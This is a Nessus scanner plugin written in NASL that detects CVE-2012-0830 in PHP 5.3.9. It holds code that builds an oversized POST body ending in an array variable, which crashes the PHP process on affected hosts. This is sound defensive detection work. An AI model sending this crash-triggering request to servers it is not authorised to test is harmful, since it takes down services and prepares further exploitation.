PHP 5.3.9 'php_register_variable_ex()' Code Execution (intrusive check)



The remote host is running a version of PHP that is affected by an arbitrary code execution vulnerability.

Specifically, the fix for the hash collision denial of service vulnerability (CVE-2011-4885) introduces a remote code execution vulnerability in the function ‘php_register_variable_ex()’ in the file ‘php_variables.c’. A new configuration variable, ‘max_input_vars’, was added as a part of the fix. If the number of input variables exceeds this value and the variable being processed is an array, code execution can occur.

Note that this script assumes the ‘max_input_vars’ parameter is set to its default value of 1000 (a host that has raised the limit will not be detected), and only runs if ‘Report paranoia’ is set to ‘Paranoid’ and ‘Enable CGI scanning’ is checked. The check is intrusive: it sends a POST request built to trigger the flaw, which crashes the PHP process on an affected host (an Apache child segfaults and returns no response; php-cgi.exe under IIS dies and an HTTP 500 is returned).

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(58039);
  script_version("1.7");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2012-0830");
  script_bugtraq_id(51830);

  script_name(english:"PHP 5.3.9 'php_register_variable_ex()' Code Execution (intrusive check)");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server uses a version of PHP that is affected by a code
execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote host is running a version of PHP that is affected by an
arbitrary code execution vulnerability.

Specifically, the fix for the hash collision denial of service
vulnerability (CVE-2011-4885) introduces a remote code execution
vulnerability in the function 'php_register_variable_ex()' in the file
'php_variables.c'. A new configuration variable, 'max_input_vars', was
added as a part of the fix. If the number of input variables exceeds
this value and the variable being processed is an array, code
execution can occur.

Note that this script assumes the 'max_input_vars' parameter is set to
the default value of 1000, and only runs if 'Report paranoia' is set
to 'Paranoid', and 'Enable CGI scanning' is checked.");
  script_set_attribute(attribute:"see_also", value:"https://gist.github.com/pilate/1725489");
  script_set_attribute(attribute:"see_also", value:"http://www.php.net/ChangeLog-5.php#5.3.10");
  # http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?d1ee2de8");
  script_set_attribute(attribute:"see_also", value:"http://svn.php.net/viewvc?view=revision&revision=323007");
  script_set_attribute(attribute:"solution", value:
"Upgrade to PHP version 5.3.10 or later.");
  # Plugin-assigned base vector (full C/I/A impact); this may differ from
  # the score other databases assign to CVE-2012-0830.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"vuln_publication_date", value:"2012/02/01");
  script_set_attribute(attribute:"patch_publication_date", value:"2012/02/02");
  script_set_attribute(attribute:"plugin_publication_date", value:"2012/02/20");

  # The finding is inferred from the PHP process crashing (no response /
  # HTTP 500) rather than from a version string or exploit output, so it
  # is flagged as a potential vulnerability.
  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:php:php");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  # ACT_ATTACK: the test request is expected to kill the PHP worker on an
  # affected host; this is not a passive check.
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2012-2022 Tenable Network Security, Inc.");

  # php_version.nasl supplies the www/PHP key; webmirror.nasl supplies the
  # list of PHP URLs used as POST targets.
  script_dependencies("php_version.nasl", "webmirror.nasl");
  # Only run when PHP was detected AND 'Report paranoia' is 'Paranoid'.
  script_require_keys("www/PHP", "Settings/ParanoidReport");
  # Honour the 'Enable CGI scanning' setting.
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

##
#
# Build the urlencoded body for the test POST: 'num' counter-named
# parameters (0=&1=&2=&...), each with an empty value, followed by one
# trailing parameter that is either an array element or a plain scalar.
#
# @param num        - number of empty name=value pairs to emit
# @param array_var  - TRUE to end with 'arr_name[]=arr_val',
#                     FALSE to end with 'plain__var=var_val'
# @return   string in form of 0=&1=&...&arr_name[]=arr_val
#           (or ...&plain__var=var_val when array_var is FALSE)
#
##
function gen_post_strs(num,array_var)
{
  local_var idx, body, tail;

  # the trailing variable decides whether PHP takes the array branch
  if (array_var) tail = 'arr_name[]=arr_val';
  else           tail = 'plain__var=var_val';

  body = '';
  idx = 0;
  while (idx < num)
  {
    body = string(body, idx, '=&');
    idx++;
  }

  return string(body, tail);
}

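#
# MAIN
#

port = get_http_port(default:80,php:TRUE);


#
# The detection signal is "PHP stopped answering" (see below), which a
# dropped connection or an in-line filter can fake; so the check only
# runs when the user has accepted that risk via 'Report paranoia'.
#
if (report_paranoia < 2) audit(AUDIT_PARANOID);


#
# get a list of php files (discovered by webmirror.nasl)
#
php_files = get_kb_list('www/' + port + '/content/extensions/php');
if (isnull(php_files)) exit(0, 'No PHP files were found on the web server on port '+port+'.');
php_files = make_list(php_files);

# the default value for 'max_input_vars' in php.ini is 1000; a host that
# raised it will not crash on this request and will not be detected.
MAX_INPUT_VARS = 1000;

# how many candidate PHP files to probe before giving up
MAX_FILES_TO_TRY = 30;

# control request: same number of variables, plain scalar at the end.
# test request: same, but the trailing variable is an array element.
good_data = gen_post_strs(num:MAX_INPUT_VARS+1, array_var:FALSE);
bad_data = gen_post_strs(num:MAX_INPUT_VARS+1, array_var:TRUE);

# prevent sending HTTP GET /
http_disable_keep_alive();

#
# find a php file that will respond to a long POST
#
count = 0;
found = 0;
foreach url (php_files)
{
  res = http_send_recv3(port:port, item: url, method:'POST', data:good_data,
                         content_type:'application/x-www-form-urlencoded', exit_on_fail:FALSE);

  # dead PHP links found by webmirror.nasl are not suitable for testing
  if(! isnull(res) && res[0] =~ "^HTTP/[0-9.]+ +200")
  {
    found = 1;
    break;
  }

  # stop after MAX_FILES_TO_TRY files (pre-increment so the limit is
  # exact); no need to test more, as an IDS/IPS/firewall might be
  # blocking POST requests with a long list of string=& pairs.
  if(++count >= MAX_FILES_TO_TRY) break;
}

if(! found)
  exit(1,'Cannot find a suitable PHP test file on the server running on port '+port+'.'+
         '\nLong POST requests may have been blocked.');


# send the array variant to the URL that just answered the control request
res = http_send_recv3(port:port, item: url, method:'POST', data:bad_data,
                       content_type:'application/x-www-form-urlencoded',exit_on_fail:FALSE);


#
# vulnerable server returns either no response or error response.
#
if (
  isnull(res) ||                # Apache httpd (Unix) produces Seg Fault, httpd dies and does not respond.
  res[0] =~ "^HTTP/[0-9.]+ +500" # IIS 7, php-cgi.exe dies and "HTTP 500" is returned.
)
{
  # say what was observed so the finding can be reproduced and triaged
  if (isnull(res)) observed = 'no response (the connection was dropped)';
  else observed = 'an HTTP 500 error';

  if (report_verbosity > 0)
  {
    report =
      '\nNessus sent a POST request with more than ' + MAX_INPUT_VARS +
      ' input variables, the last one being an array, to the following URL :' +
      '\n' +
      '\n  ' + build_url(port:port, qs:url) +
      '\n' +
      '\nThe same request with a plain trailing variable was answered with HTTP 200,' +
      '\nwhereas the array variant resulted in ' + observed + '.\n';
    security_hole(port:port, extra:report);
  }
  else security_hole(port:port);
  exit(0);
}
#
# 1. PHP versions that do not support 'max_input_vars'.
# 2. PHP version 5.3.10 or later (patched)
# 3. vulnerable version with 'max_input_vars' > 1000
#
else
{
  if( res[0] =~ "^HTTP/[0-9.]+ +200")
  {
    exit(0, 'The PHP version used by the web server listening on port '+port+' is not affected '+
            'or its \'max_input_vars\' configuration parameter is greater than the default value '+MAX_INPUT_VARS+'.');

  }
  else exit(1, 'The web server listening on port '+port+' returned an unexpected response.');
}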
